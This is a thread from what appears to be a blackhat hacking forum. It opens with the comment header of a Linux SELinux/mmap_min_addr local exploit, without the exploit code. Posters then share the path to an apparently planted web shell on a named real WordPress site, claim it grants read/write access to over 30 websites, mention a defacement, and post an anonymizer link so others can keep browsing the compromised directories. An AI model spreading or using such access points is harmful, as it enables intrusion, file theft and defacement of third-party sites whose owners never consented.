Best Blackhat Forum

Full Version: [GET] Access Black Hole In Website - Server Exploit - ALL CONTENT REVEALED - NO BS - EXTREMELY SENSITIVE INFO
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2
This exploit makes use of the SELinux and the mmap_min_addr problem to
* exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3.
* The problem, first noticed by Brad Spengler, was described by Red Hat in
* Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and
* the mmap_min_addr protection[2].
*
* Support for i386 and x86_64 was added for completeness. For a more complete
* implementation, refer to Brad Spengler's exploit[3], which also implements
* the personality trick[4] published by Tavis Ormandy and Julien Tinnes.


Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool

To Access All The Files Within you will have to browse through the Collection...
1. Download the small file here
2. Browse through make sure using proxy
3. Have Fun With It!

PASSWORD TO THE FILE
[hide]bestblackhatforum.com[/hide]

Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool

By the way please understand that you have direct access to all files and please do not modify any files lest you know what you are doing


Its too late now... the file has been removed by the owner of the website or by someone here that has removed the file...
And just what the f**k are we supposed to do with this?

Code:
http://100dollarsadayin30days.com/wp-content/uploads/optpress/images_comingsoon/2012090716-15-05cache_1328066839.php#
you are welcome

please dont bash me for sharing with the community

(11-10-2012 05:35 AM)ArnieAbrams Wrote: [ -> ]you will see the ".." that means click it to go up one directory higher til you get to the root directory and you will see

And just what the f**k are we supposed to do with this?

Code:
/wp-content/uploads/optpress/images_comingsoon/2012090716-15-05cache_1328066839.php#
(11-10-2012 05:35 AM)ArnieAbrams Wrote: [ -> ]And just what the f**k are we supposed to do with this?

Code:
/wp-content/uploads/optpress/images_comingsoon/2012090716-15-05cache_1328066839.php#
lololololololololololololololol I was wondering the same thing seem like a new language. Thanks for the effort Frostbite
Some people still dont know exactly what I have shared...
Let me explain....
You have remote access with read write permissions to over 30 websites

take a closer look
I can now download the plugin Wp Traffic Control by go to this directory
/home/mannntas/public_html/100dollarsadayin30days.com/wp-content/uploads/ drwxr-xr-x [ home ]

what you would then do is go to the directory in your browser and you can download whatever you want withing that directory
for instance in this directory
click here to find out
[hide]http://100dollarsadayin30days.com/wp-content/uploads/[/spoiler]
The caching system seems to be generating the file automatically and then clearing the cache as of right now the file is no longer available

By going to the main page you will see this
[Image: 121105023549692433.jpg]

Hacked By Metropolis
********************************************************************************​******************************
********************************************************************************​******************************
Metropolis you didnt hack anything... I just give you the resources to do so....
Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool
hey frostbite,
thx for sharing, this will be helpful for me !
But most of the people here won't understand what are all this explanation, as they are only IM (?)
they don't know what are server management, nor read and write permissions...
Quote:Its too late now... the file has been removed by the owner of the website or by someone here that has removed the file...

Oh I just read your last sentence.
I am too late :/
Actually u guys can still have access browsing the directory by using the following

[hide]anonym.to/?http://100dollarsadayin30days.com/wp-content/uploads/optpress/[/spoiler]
But I'm not sure what to look for in it... hmm...
Pages: 1 2
Reference URL's